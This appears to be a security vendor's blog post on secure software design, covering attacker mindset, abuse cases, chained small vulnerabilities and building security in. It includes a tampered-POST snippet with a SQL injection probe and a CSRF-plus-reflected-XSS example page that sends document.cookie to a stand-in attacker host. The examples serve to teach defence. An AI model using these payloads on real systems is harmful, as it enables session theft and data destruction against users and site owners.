4 principles of secure software design

Synopsys Editorial Team

Aug 17, 2016 / 6 min read

Secure software design sounds like a pretty concrete concept, right? The software is either secure or it’s not. If only it were that simple. Software design and development are evolving at an amazing rate, which is why it’s critically important to stay on top of the security measures protecting each piece of software. Here are four ways to stay sharp and keep ahead of the bad people.

1. Know that somebody is out to get you.

Maybe they already have and you don’t even know it. Nope, this isn’t the tagline for Hollywood’s next psychological thriller. It’s the day-to-day world of corporate computing, a global economy and infrastructure built on silicon. I’m talking about the ‘digital you’ here: the collection of ones and zeroes stored across databases, the ubiquitous cloud, and every square inch of virtual real estate. In the physical world, or ‘meat space’ as I affectionately like to think of it, the digital you takes the form of credit cards, Social Security numbers, medical records, and countless other embodiments.

A single individual accumulates a huge cyber footprint over the course of a lifetime. However, the average Joe is rarely singled out as a direct target. Rather, the bad people go after the corporations that hold the digital you.

They’re not just after you. Or me. They’re after all of us…

Reading this back to myself, I don’t hear it in my own voice. Instead, I hear that of Elliot Alderson, the protagonist of television’s Mr. Robot. Hollywood isn’t far from the truth sometimes.

Although digital crime isn’t as dramatic or sexy as Hollywood makes it out to be, it’s something worth being paranoid about. Somebody, no—somebodies—are out to get you. And they won’t be easily deterred. As a software security consultant, this is a paranoia I wish every software developer, project manager, and CEO would come to understand sooner rather than later. It’s unfortunate that my great aunt can’t write software. I mean, she won’t even get an email address because she’s afraid that’s how hackers will invade her brain.

In contrast to the conventional wisdom of ‘fearing what we don’t understand,’ perhaps we tend not to fear what we don’t understand in the cyber world. Maybe we should.

2. Be mindful of abuse cases.

Even skilled and experienced developers often don’t understand the mentality of an attacker. Sure, they understand the technical details of how someone could abuse a system to perform unintended actions. It’s the psychology of attackers that they fail to grasp. That’s a slippery slope into what I’m going to dub the Happy Path Security Fallacy, the Target Fallacy, and the Everest Fallacy.

The Happy Path Security Fallacy

The Happy Path Security Fallacy is the false sense of security created by one’s own ignorance. Developers tend to judge the security posture of their creations with their own yardstick, something along the lines of: “This is certainly secure because I built it, and even I couldn’t hack it.” What’s my point? Developers focus on the use cases.

This Happy Path thought process disregards the implications of the abuse cases. A misconception about POST parameters that I commonly see demonstrates this nicely. It goes something like: “We don’t need to worry about x, y, or z because the input comes from POST parameters over HTTPS, so it can’t be tampered with.” It’s true that an attacker can’t easily manipulate a third party’s input in this scenario. What these developers fail to realize is how easy it is for an attacker to modify their own input. In fact, it’s trivial with an intercepting proxy.
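
To make the abuse case concrete, here’s a minimal sketch in Python. The endpoint and parameter names are hypothetical; the point is that an attacker doesn’t even need an intercepting proxy. They can skip the browser and the form entirely and send whatever POST body they like:

    import requests

    # The application's form may enforce rules client side, but nothing
    # stops an attacker from skipping the form (and the browser) entirely.
    tampered = {
        "item_id": "1337",
        "quantity": "-5",                      # sidesteps client-side validation
        "comment": "'; DROP TABLE orders;--",  # probing for SQL injection
    }

    # HTTPS encrypts the channel; it says nothing about the honesty of the
    # content. The server receives this as a perfectly well-formed POST.
    resp = requests.post("https://shop.example.com/cart/add", data=tampered)
    print(resp.status_code)

Any input validation worth having must happen on the server, because the client side of the conversation is entirely under the attacker’s control.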

The best way to avoid falling victim to this fallacy is to learn to think like an attacker. A security training program may only reinforce the fallacy if it concentrates solely on defense. It’s important that security training include a strong concentration on attacking as well.

The Target Fallacy

The Target Fallacy is the belief that attackers won’t target your business. The basis for this belief often comes from a false sense of security created by patching the obvious, easy-to-exploit vulnerabilities—the ‘low-hanging fruit,’ as they’re often called.

When presented with vulnerabilities that are more subtle, the business confidently responds that such vulnerabilities are too obscure. “Sure,” they tell me, “you found this but you had a whitelisted IP, our source code, and access to our development team. I don’t think it’s very likely anybody else will find this without those accommodations.” If you’re thinking that this sounds like ‘security through obscurity,’ you’re right. And you’re also right that it’s hardly security at all.

Hackers like challenges. The greater the challenge, the greater the reward.

The Everest Fallacy

The Everest Fallacy is closely related to the Target Fallacy. It’s the belief that a vulnerability is too involved, too time-consuming, or simply too difficult for an attacker to bother with, much less successfully exploit.

Why have I dubbed it the Everest Fallacy, you ask? Consider your passion. For the sake of argument, let’s say you’re an avid mountain climber. Once you’ve summited a mountain, do you decide not to climb a taller one because it will be too difficult? No way! You climb it because it’s there, because you can. You love that kind of challenge. Well, hacking is the same way. Hackers will abuse your software because they can.

3. Understand that small vulnerabilities build upon each other.

It’s also important to consider the small things, and in particular, the small vulnerabilities. Small vulnerabilities are just that: bugs or flaws with relatively small security implications. But there is power in numbers. Clever attackers seem to have a knack for getting the most out of every small vulnerability, and they often find ways to chain three or four of them together into an impressive synergy of destruction.

The worst thing about small vulnerabilities (or best, depending on your agenda) is that their mitigation is often ignored for the sake of concentrating on fixing the big ones. Even small vulnerabilities that are relatively quick and easy to fix fall by the wayside, either forgotten about completely or classified as “known vulnerabilities.” I suppose that has a better ring to it than “vulnerabilities we don’t take seriously.”

The No Biggie Fallacy

I’ve witnessed the fallacy I’m dubbing the No Biggie firsthand, during a second-round application test for a long-term client. One of the lower-priority findings on the first test was a cross-site request forgery (CSRF) issue I had discovered. Over a year later, when I began the next annual assessment, it still hadn’t been remediated. Every page but one rather obscure one was protected by CSRF tokens. Although it would have been very easy to do the same for that page, it went unpatched because it was deemed unimportant.

It turned out that a recent release had introduced a reflected cross-site scripting (XSS) vulnerability into that page and a few others. Reflected XSS is also typically treated as lower importance (especially when it requires authentication and must be sent via POST). However, it just so happened that the vulnerable parameter could be passed in the CSRF request, creating an elegant attack vector. I doubt either issue would ever have been mitigated if one hadn’t worsened the impact of the other.
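
To illustrate how such a chain fits together, here’s a minimal sketch, again in Python and with entirely hypothetical endpoint and parameter names. The attacker hosts a page that auto-submits a forged POST (the CSRF half) carrying a payload the server reflects unescaped (the XSS half), so merely visiting the page runs attacker script in the victim’s authenticated session:

    # Hypothetical chain of two "small" findings: a page missing a CSRF
    # token whose "nickname" parameter is reflected without escaping.
    attack_page = """
    <form id="f" action="https://app.example.com/profile/update" method="POST">
      <!-- HTML entities decode on submit, so the server receives a live
           <script> tag in the reflected parameter. -->
      <input type="hidden" name="nickname"
             value="&lt;script&gt;new Image().src='https://evil.example.com/c?'+document.cookie;&lt;/script&gt;">
    </form>
    <script>document.getElementById('f').submit();</script>
    """

    # Host this anywhere and lure a logged-in victim to it; their own
    # browser fires the forged request with their session attached.
    with open("attack.html", "w") as handle:
        handle.write(attack_page)

Neither finding is impressive on its own; together they hand an attacker the victim’s session.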

4. Build things securely for the sake of posterity.

That brings me to my final point. Building security in is largely about building things securely for the sake of posterity. In the previous example, the two halves of the reflected-XSS-via-CSRF attack didn’t come into existence at the same time. The moral here is that just because something isn’t exploitable today doesn’t guarantee that it won’t be exploitable tomorrow.

Future code changes may escalate previously small issues into much bigger ones. Moreover, there’s never any guarantee that all of the vulnerabilities in a system are known. Even without code changes, a new vulnerability may be discovered that benefits from the poor security practices of the past. Maybe it’s a common vulnerability that went unnoticed, a subtle vulnerability unique to the particular system, or a zero-day exploit that makes its way into the public domain.

For big things and small things alike, your best bet for minimizing the impact of any threat is to build security into every tier and every stage of development.

Summing it up.

Regardless of how many precautions you take, at the end of the day, somebodies are still out to get you. Software security is a cat-and-mouse game. Don’t fall victim to the fallacies above and you’ll help yourself stay out in front. In short, stay paranoid.
